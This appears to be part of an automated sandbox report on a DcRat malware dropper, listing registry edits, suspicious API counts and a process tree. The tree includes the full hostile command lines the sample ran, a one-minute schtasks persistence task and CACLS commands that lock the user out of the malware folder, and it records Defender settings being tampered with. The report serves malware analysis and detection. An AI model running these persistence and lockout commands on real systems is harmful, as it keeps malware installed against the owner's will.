Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-448 = "Azerbaijan Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-672 = "AUS Eastern Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1722 = "Libya Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-591 = "Malay Peninsula Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-451 = "Caucasus Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-412 = "E. Africa Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-364 = "Middle East Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-3141 = "South Sudan Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-631 = "Tokyo Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-104 = "Central Brazilian Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-384 = "Namibia Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-872 = "Pakistan Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2372 = "Easter Island Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1021 = "Bangladesh Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2871 = "Magallanes Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2161 = "Altai Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2892 = "Sudan Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1411 = "Syria Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-352 = "FLE Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-891 = "Morocco Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

3xE89Us.exeAppLaunch.exeExplorer.EXE

pid	process
3280	3xE89Us.exe
3280	3xE89Us.exe
5104	AppLaunch.exe
5104	AppLaunch.exe
3476	Explorer.EXE
3476	Explorer.EXE
3476	Explorer.EXE
3476	Explorer.EXE
3476	Explorer.EXE
3476	Explorer.EXE
3476	Explorer.EXE
3476	Explorer.EXE
3476	Explorer.EXE
3476	Explorer.EXE
3476	Explorer.EXE
3476	Explorer.EXE
3476	Explorer.EXE
3476	Explorer.EXE
3476	Explorer.EXE
3476	Explorer.EXE
3476	Explorer.EXE
3476	Explorer.EXE
3476	Explorer.EXE
3476	Explorer.EXE
3476	Explorer.EXE
3476	Explorer.EXE
3476	Explorer.EXE
3476	Explorer.EXE
3476	Explorer.EXE
3476	Explorer.EXE
3476	Explorer.EXE
3476	Explorer.EXE
3476	Explorer.EXE
3476	Explorer.EXE
3476	Explorer.EXE
3476	Explorer.EXE
3476	Explorer.EXE
3476	Explorer.EXE
3476	Explorer.EXE
3476	Explorer.EXE
3476	Explorer.EXE
3476	Explorer.EXE
3476	Explorer.EXE
3476	Explorer.EXE
3476	Explorer.EXE
3476	Explorer.EXE
3476	Explorer.EXE
3476	Explorer.EXE
3476	Explorer.EXE
3476	Explorer.EXE
3476	Explorer.EXE
3476	Explorer.EXE
3476	Explorer.EXE
3476	Explorer.EXE
3476	Explorer.EXE
3476	Explorer.EXE
3476	Explorer.EXE
3476	Explorer.EXE
3476	Explorer.EXE
3476	Explorer.EXE
3476	Explorer.EXE
3476	Explorer.EXE
3476	Explorer.EXE
3476	Explorer.EXE

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

Explorer.EXE

pid process

3476 Explorer.EXE
Suspicious behavior: MapViewOfSection 2 IoCs

Processes:

3xE89Us.exetoolspub2.exe

pid process

3280 3xE89Us.exe
6248 toolspub2.exe

pid	process
3476	Explorer.EXE

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 22 IoCs

Processes:

msedge.exemsedge.exe

pid	process
3600	msedge.exe
3600	msedge.exe
3600	msedge.exe
3600	msedge.exe
3600	msedge.exe
3600	msedge.exe
3600	msedge.exe
3600	msedge.exe
3600	msedge.exe
3600	msedge.exe
3600	msedge.exe
3600	msedge.exe
3600	msedge.exe
3600	msedge.exe
3600	msedge.exe
5892	msedge.exe
5892	msedge.exe
5892	msedge.exe
5892	msedge.exe
5892	msedge.exe
5892	msedge.exe
5892	msedge.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

AppLaunch.exeExplorer.EXEkos4.exeAUDIODG.EXE

description	pid	process
Token: SeDebugPrivilege	5104	AppLaunch.exe
Token: SeShutdownPrivilege	3476	Explorer.EXE
Token: SeCreatePagefilePrivilege	3476	Explorer.EXE
Token: SeShutdownPrivilege	3476	Explorer.EXE
Token: SeCreatePagefilePrivilege	3476	Explorer.EXE
Token: SeShutdownPrivilege	3476	Explorer.EXE
Token: SeCreatePagefilePrivilege	3476	Explorer.EXE
Token: SeShutdownPrivilege	3476	Explorer.EXE
Token: SeCreatePagefilePrivilege	3476	Explorer.EXE
Token: SeShutdownPrivilege	3476	Explorer.EXE
Token: SeCreatePagefilePrivilege	3476	Explorer.EXE
Token: SeShutdownPrivilege	3476	Explorer.EXE
Token: SeCreatePagefilePrivilege	3476	Explorer.EXE
Token: SeShutdownPrivilege	3476	Explorer.EXE
Token: SeCreatePagefilePrivilege	3476	Explorer.EXE
Token: SeShutdownPrivilege	3476	Explorer.EXE
Token: SeCreatePagefilePrivilege	3476	Explorer.EXE
Token: SeShutdownPrivilege	3476	Explorer.EXE
Token: SeCreatePagefilePrivilege	3476	Explorer.EXE
Token: SeShutdownPrivilege	3476	Explorer.EXE
Token: SeCreatePagefilePrivilege	3476	Explorer.EXE
Token: SeShutdownPrivilege	3476	Explorer.EXE
Token: SeCreatePagefilePrivilege	3476	Explorer.EXE
Token: SeShutdownPrivilege	3476	Explorer.EXE
Token: SeCreatePagefilePrivilege	3476	Explorer.EXE
Token: SeShutdownPrivilege	3476	Explorer.EXE
Token: SeCreatePagefilePrivilege	3476	Explorer.EXE
Token: SeShutdownPrivilege	3476	Explorer.EXE
Token: SeCreatePagefilePrivilege	3476	Explorer.EXE
Token: SeShutdownPrivilege	3476	Explorer.EXE
Token: SeCreatePagefilePrivilege	3476	Explorer.EXE
Token: SeShutdownPrivilege	3476	Explorer.EXE
Token: SeCreatePagefilePrivilege	3476	Explorer.EXE
Token: SeShutdownPrivilege	3476	Explorer.EXE
Token: SeCreatePagefilePrivilege	3476	Explorer.EXE
Token: SeShutdownPrivilege	3476	Explorer.EXE
Token: SeCreatePagefilePrivilege	3476	Explorer.EXE
Token: SeShutdownPrivilege	3476	Explorer.EXE
Token: SeCreatePagefilePrivilege	3476	Explorer.EXE
Token: SeShutdownPrivilege	3476	Explorer.EXE
Token: SeCreatePagefilePrivilege	3476	Explorer.EXE
Token: SeDebugPrivilege	5952	kos4.exe
Token: SeShutdownPrivilege	3476	Explorer.EXE
Token: SeCreatePagefilePrivilege	3476	Explorer.EXE
Token: SeShutdownPrivilege	3476	Explorer.EXE
Token: SeCreatePagefilePrivilege	3476	Explorer.EXE
Token: SeShutdownPrivilege	3476	Explorer.EXE
Token: SeCreatePagefilePrivilege	3476	Explorer.EXE
Token: SeShutdownPrivilege	3476	Explorer.EXE
Token: SeCreatePagefilePrivilege	3476	Explorer.EXE
Token: 33	6148	AUDIODG.EXE
Token: SeIncBasePriorityPrivilege	6148	AUDIODG.EXE
Token: SeShutdownPrivilege	3476	Explorer.EXE
Token: SeCreatePagefilePrivilege	3476	Explorer.EXE
Token: SeShutdownPrivilege	3476	Explorer.EXE
Token: SeCreatePagefilePrivilege	3476	Explorer.EXE
Token: SeShutdownPrivilege	3476	Explorer.EXE
Token: SeCreatePagefilePrivilege	3476	Explorer.EXE
Token: SeShutdownPrivilege	3476	Explorer.EXE
Token: SeCreatePagefilePrivilege	3476	Explorer.EXE
Token: SeShutdownPrivilege	3476	Explorer.EXE
Token: SeCreatePagefilePrivilege	3476	Explorer.EXE
Token: SeShutdownPrivilege	3476	Explorer.EXE
Token: SeCreatePagefilePrivilege	3476	Explorer.EXE

Suspicious use of FindShellTrayWindow 53 IoCs

Processes:

msedge.exeExplorer.EXErundll32.exemsedge.exe

pid	process
3600	msedge.exe
3600	msedge.exe
3600	msedge.exe
3600	msedge.exe
3600	msedge.exe
3600	msedge.exe
3600	msedge.exe
3600	msedge.exe
3600	msedge.exe
3600	msedge.exe
3600	msedge.exe
3600	msedge.exe
3600	msedge.exe
3600	msedge.exe
3600	msedge.exe
3600	msedge.exe
3600	msedge.exe
3600	msedge.exe
3600	msedge.exe
3600	msedge.exe
3600	msedge.exe
3600	msedge.exe
3600	msedge.exe
3600	msedge.exe
3600	msedge.exe
3476	Explorer.EXE
3476	Explorer.EXE
6372	rundll32.exe
5892	msedge.exe
5892	msedge.exe
5892	msedge.exe
5892	msedge.exe
5892	msedge.exe
5892	msedge.exe
5892	msedge.exe
5892	msedge.exe
5892	msedge.exe
5892	msedge.exe
5892	msedge.exe
5892	msedge.exe
5892	msedge.exe
5892	msedge.exe
5892	msedge.exe
5892	msedge.exe
5892	msedge.exe
5892	msedge.exe
5892	msedge.exe
5892	msedge.exe
5892	msedge.exe
5892	msedge.exe
5892	msedge.exe
5892	msedge.exe
5892	msedge.exe

Suspicious use of SendNotifyMessage 48 IoCs

Processes:

msedge.exemsedge.exe

pid	process
3600	msedge.exe
3600	msedge.exe
3600	msedge.exe
3600	msedge.exe
3600	msedge.exe
3600	msedge.exe
3600	msedge.exe
3600	msedge.exe
3600	msedge.exe
3600	msedge.exe
3600	msedge.exe
3600	msedge.exe
3600	msedge.exe
3600	msedge.exe
3600	msedge.exe
3600	msedge.exe
3600	msedge.exe
3600	msedge.exe
3600	msedge.exe
3600	msedge.exe
3600	msedge.exe
3600	msedge.exe
3600	msedge.exe
3600	msedge.exe
5892	msedge.exe
5892	msedge.exe
5892	msedge.exe
5892	msedge.exe
5892	msedge.exe
5892	msedge.exe
5892	msedge.exe
5892	msedge.exe
5892	msedge.exe
5892	msedge.exe
5892	msedge.exe
5892	msedge.exe
5892	msedge.exe
5892	msedge.exe
5892	msedge.exe
5892	msedge.exe
5892	msedge.exe
5892	msedge.exe
5892	msedge.exe
5892	msedge.exe
5892	msedge.exe
5892	msedge.exe
5892	msedge.exe
5892	msedge.exe

Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

Broom.exe

pid process

2240 Broom.exe
Suspicious use of UnmapMainImage 1 IoCs

Processes:

Explorer.EXE

pid process

3476 Explorer.EXE

pid	process
2240	Broom.exe

pid	process
3476	Explorer.EXE

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

NEAS.f1f0745d4e72ec4b6fbd76c2610ad100.exeEe8Pp60.exetk0JW85.exebK3NC71.exe1Yl21hz1.exe2Ro1236.exe4PL534px.exe5fG7Mk0.exeexplothe.exe

description	pid	process	target process
PID 4420 wrote to memory of 4684	4420	NEAS.f1f0745d4e72ec4b6fbd76c2610ad100.exe	Ee8Pp60.exe
PID 4420 wrote to memory of 4684	4420	NEAS.f1f0745d4e72ec4b6fbd76c2610ad100.exe	Ee8Pp60.exe
PID 4420 wrote to memory of 4684	4420	NEAS.f1f0745d4e72ec4b6fbd76c2610ad100.exe	Ee8Pp60.exe
PID 4684 wrote to memory of 2836	4684	Ee8Pp60.exe	tk0JW85.exe
PID 4684 wrote to memory of 2836	4684	Ee8Pp60.exe	tk0JW85.exe
PID 4684 wrote to memory of 2836	4684	Ee8Pp60.exe	tk0JW85.exe
PID 2836 wrote to memory of 624	2836	tk0JW85.exe	bK3NC71.exe
PID 2836 wrote to memory of 624	2836	tk0JW85.exe	bK3NC71.exe
PID 2836 wrote to memory of 624	2836	tk0JW85.exe	bK3NC71.exe
PID 624 wrote to memory of 4888	624	bK3NC71.exe	1Yl21hz1.exe
PID 624 wrote to memory of 4888	624	bK3NC71.exe	1Yl21hz1.exe
PID 624 wrote to memory of 4888	624	bK3NC71.exe	1Yl21hz1.exe
PID 4888 wrote to memory of 5104	4888	1Yl21hz1.exe	AppLaunch.exe
PID 4888 wrote to memory of 5104	4888	1Yl21hz1.exe	AppLaunch.exe
PID 4888 wrote to memory of 5104	4888	1Yl21hz1.exe	AppLaunch.exe
PID 4888 wrote to memory of 5104	4888	1Yl21hz1.exe	AppLaunch.exe
PID 4888 wrote to memory of 5104	4888	1Yl21hz1.exe	AppLaunch.exe
PID 4888 wrote to memory of 5104	4888	1Yl21hz1.exe	AppLaunch.exe
PID 4888 wrote to memory of 5104	4888	1Yl21hz1.exe	AppLaunch.exe
PID 4888 wrote to memory of 5104	4888	1Yl21hz1.exe	AppLaunch.exe
PID 624 wrote to memory of 5048	624	bK3NC71.exe	2Ro1236.exe
PID 624 wrote to memory of 5048	624	bK3NC71.exe	2Ro1236.exe
PID 624 wrote to memory of 5048	624	bK3NC71.exe	2Ro1236.exe
PID 5048 wrote to memory of 3528	5048	2Ro1236.exe	AppLaunch.exe
PID 5048 wrote to memory of 3528	5048	2Ro1236.exe	AppLaunch.exe
PID 5048 wrote to memory of 3528	5048	2Ro1236.exe	AppLaunch.exe
PID 5048 wrote to memory of 3528	5048	2Ro1236.exe	AppLaunch.exe
PID 5048 wrote to memory of 3528	5048	2Ro1236.exe	AppLaunch.exe
PID 5048 wrote to memory of 3528	5048	2Ro1236.exe	AppLaunch.exe
PID 5048 wrote to memory of 3528	5048	2Ro1236.exe	AppLaunch.exe
PID 5048 wrote to memory of 3528	5048	2Ro1236.exe	AppLaunch.exe
PID 5048 wrote to memory of 3528	5048	2Ro1236.exe	AppLaunch.exe
PID 5048 wrote to memory of 3528	5048	2Ro1236.exe	AppLaunch.exe
PID 2836 wrote to memory of 3280	2836	tk0JW85.exe	3xE89Us.exe
PID 2836 wrote to memory of 3280	2836	tk0JW85.exe	3xE89Us.exe
PID 2836 wrote to memory of 3280	2836	tk0JW85.exe	3xE89Us.exe
PID 4684 wrote to memory of 404	4684	Ee8Pp60.exe	4PL534px.exe
PID 4684 wrote to memory of 404	4684	Ee8Pp60.exe	4PL534px.exe
PID 4684 wrote to memory of 404	4684	Ee8Pp60.exe	4PL534px.exe
PID 404 wrote to memory of 2084	404	4PL534px.exe	AppLaunch.exe
PID 404 wrote to memory of 2084	404	4PL534px.exe	AppLaunch.exe
PID 404 wrote to memory of 2084	404	4PL534px.exe	AppLaunch.exe
PID 404 wrote to memory of 2052	404	4PL534px.exe	AppLaunch.exe
PID 404 wrote to memory of 2052	404	4PL534px.exe	AppLaunch.exe
PID 404 wrote to memory of 2052	404	4PL534px.exe	AppLaunch.exe
PID 404 wrote to memory of 1068	404	4PL534px.exe	AppLaunch.exe
PID 404 wrote to memory of 1068	404	4PL534px.exe	AppLaunch.exe
PID 404 wrote to memory of 1068	404	4PL534px.exe	AppLaunch.exe
PID 404 wrote to memory of 1068	404	4PL534px.exe	AppLaunch.exe
PID 404 wrote to memory of 1068	404	4PL534px.exe	AppLaunch.exe
PID 404 wrote to memory of 1068	404	4PL534px.exe	AppLaunch.exe
PID 404 wrote to memory of 1068	404	4PL534px.exe	AppLaunch.exe
PID 404 wrote to memory of 1068	404	4PL534px.exe	AppLaunch.exe
PID 4420 wrote to memory of 4508	4420	NEAS.f1f0745d4e72ec4b6fbd76c2610ad100.exe	5fG7Mk0.exe
PID 4420 wrote to memory of 4508	4420	NEAS.f1f0745d4e72ec4b6fbd76c2610ad100.exe	5fG7Mk0.exe
PID 4420 wrote to memory of 4508	4420	NEAS.f1f0745d4e72ec4b6fbd76c2610ad100.exe	5fG7Mk0.exe
PID 4508 wrote to memory of 3592	4508	5fG7Mk0.exe	explothe.exe
PID 4508 wrote to memory of 3592	4508	5fG7Mk0.exe	explothe.exe
PID 4508 wrote to memory of 3592	4508	5fG7Mk0.exe	explothe.exe
PID 3592 wrote to memory of 4620	3592	explothe.exe	schtasks.exe
PID 3592 wrote to memory of 4620	3592	explothe.exe	schtasks.exe
PID 3592 wrote to memory of 4620	3592	explothe.exe	schtasks.exe
PID 3592 wrote to memory of 2116	3592	explothe.exe	cmd.exe
PID 3592 wrote to memory of 2116	3592	explothe.exe	cmd.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of UnmapMainImage
PID:3476

C:\Users\Admin\AppData\Local\Temp\NEAS.f1f0745d4e72ec4b6fbd76c2610ad100.exe
"C:\Users\Admin\AppData\Local\Temp\NEAS.f1f0745d4e72ec4b6fbd76c2610ad100.exe"
2⤵
- DcRat
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:4420

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Ee8Pp60.exe
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Ee8Pp60.exe
3⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:4684

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\tk0JW85.exe
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\tk0JW85.exe
4⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:2836

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\bK3NC71.exe
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\bK3NC71.exe
5⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:624

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1Yl21hz1.exe
C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1Yl21hz1.exe
6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:4888

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
7⤵
- Modifies Windows Defender Real-time Protection settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5104

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2Ro1236.exe
C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2Ro1236.exe
6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:5048

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
7⤵
PID:3528

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3528 -s 552
8⤵
- Program crash
PID:1564

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\3xE89Us.exe
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\3xE89Us.exe
5⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:3280

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\4PL534px.exe
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\4PL534px.exe
4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:404

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
5⤵
PID:2084

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
5⤵
PID:2052

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
5⤵
PID:1068

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\5fG7Mk0.exe
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\5fG7Mk0.exe
3⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4508

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
"C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe"
4⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3592

C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN explothe.exe /TR "C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe" /F
5⤵
- DcRat
- Creates scheduled task(s)
PID:4620

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "explothe.exe" /P "Admin:N"&&CACLS "explothe.exe" /P "Admin:R" /E&&echo Y|CACLS "..\fefffe8cea" /P "Admin:N"&&CACLS "..\fefffe8cea" /P "Admin:R" /E&&Exit
5⤵
PID:2116

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
6⤵
PID:4948

C:\Windows\SysWOW64\cacls.exe
CACLS "explothe.exe" /P "Admin:N"
6⤵
PID:3228

C:\Windows\SysWOW64\cacls.exe
CACLS "explothe.exe" /P "Admin:R" /E
6⤵
PID:1172

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
6⤵
PID:4416

C:\Windows\SysWOW64\cacls.exe
CACLS "..\fefffe8cea" /P "Admin:N"
6⤵
PID:2992

C:\Windows\SysWOW64\cacls.exe
CACLS "..\fefffe8cea" /P "Admin:R" /E
6⤵
PID:2060

C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\006700e5a2ab05\clip64.dll, Main
5⤵
- Loads dropped DLL
PID:6572

C:\Users\Admin\AppData\Local\Temp\B17.exe
C:\Users\Admin\AppData\Local\Temp\B17.exe
2⤵
- Executes dropped EXE
- Adds Run key to start application
PID:628

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Lb0Xn6uD.exe
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Lb0Xn6uD.exe
3⤵
- Executes dropped EXE
- Adds Run key to start application
PID:1648

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\AB6LH6xe.exe
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\AB6LH6xe.exe
4⤵
- Executes dropped EXE
- Adds Run key to start application
PID:2836

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\aP7cd1aC.exe
C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\aP7cd1aC.exe
5⤵
- Executes dropped EXE
- Adds Run key to start application
PID:2340

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\Qq4rX0EJ.exe
C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\Qq4rX0EJ.exe
6⤵
- Executes dropped EXE
- Adds Run key to start application
PID:784

C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\1LH55nJ8.exe
C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\1LH55nJ8.exe
7⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:2804

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
8⤵
PID:3904

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3904 -s 540
9⤵
- Program crash
PID:1332

C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\2Cl404Rl.exe
C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\2Cl404Rl.exe
7⤵
- Executes dropped EXE
PID:4480

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\1BB2.bat" "
2⤵
PID:624

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.facebook.com/login
3⤵
- Enumerates system info in registry
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:3600

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ff88e7d46f8,0x7ff88e7d4708,0x7ff88e7d4718
4⤵
PID:3220

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,4802029098032835671,9433700034318756242,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=3 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2860 /prefetch:1
4⤵
PID:2316

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
